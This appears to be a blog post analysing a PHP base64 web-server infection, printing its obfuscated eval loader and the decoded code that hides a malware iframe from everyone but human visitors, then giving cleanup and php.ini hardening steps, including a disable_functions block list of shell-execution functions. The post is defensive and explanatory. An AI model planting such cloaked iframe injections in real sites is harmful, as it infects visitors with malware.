PHP Base64 Virus

You may or may not have heard of it but it’s out there…
The virus looks something like this:


<?php
    $auth_pass = "133a113117ca7d73b44ad035e570e67b";
    $virusaworm = "7X17e9q48xyv9ESAk ... maCymQa9uHCk7"; 
    eval(base64_decode($script));
    @eval(gzinflate(base64_decode($virusaworm)));
?>

And (almost) every PHP file will contain this after being infected:

<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDA ... XY+JzsNCn0='));

The actual code:

<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp',
...  'wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
    array("216.239.32.0","216.239.63.255"),
    ...
    array("38.0.0.0","38.255.255.255")
    );
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
    $first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
    if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
    if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
    echo '<div style="position: absolute; left: -1999px; top: -2999px;">
            <ΙFRAME src="http://example.org/QQkcEAAcDAAMBBw==" width="2" height="2"></ΙFRAME>
        </div>';
}

This means that all the pages with this code contain an invisible iframe but only when the user isn’t a bot.
That page in the iframe contains malware infecting the user.

How do we get rid of it?

in your webroot put a .htaccess file with the following content:
order deny,allow
deny from all
allow from 127.0.0.1

Now upload Trinetra v 2.0 to your webroot and execute trinetra-cleaner2.php (locally).

After you’ve done all the steps to prevent this from happening again, delete the .htaccess file.

How do we prevent it?

In your php.ini file put the following lines:
allow_url_fopen = off
allow_url_include = off
disable_functions = "apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd, eval, exec, fp, fput, ftp_connect, ftp_exec, ftp_get, ftp_login, ftp_nb_fput, ftp_put, ftp_raw, ftp_rawlist, highlight_file, ini_alter, ini_get_all, ini_restore, inject_code, mysql_pconnect, openlog, passthru, php_uname, phpAds_remoteInfo, phpAds_XmlRpc, phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid, posix_setuid, posix_uname, proc_close, proc_get_status, proc_nice, proc_open, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode"

Remove the functions you do need, for example some template systems use eval().

Change your file permissions!

Install and configure suhosin. You can whitelist functions inside eval() so functions like base64_decode are never allowed to execute.
In that case even when some bot managed to upload the payload, it cannot be executed correctly.

 

Interesting readings

http://www.cyberciti.biz/tips/php-security-best-practices-tutorial.html
http://www.webdigi.co.uk/blog/2009/how-to-detect-if-your-webserver-is-hacked-and-get-alerted/



Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s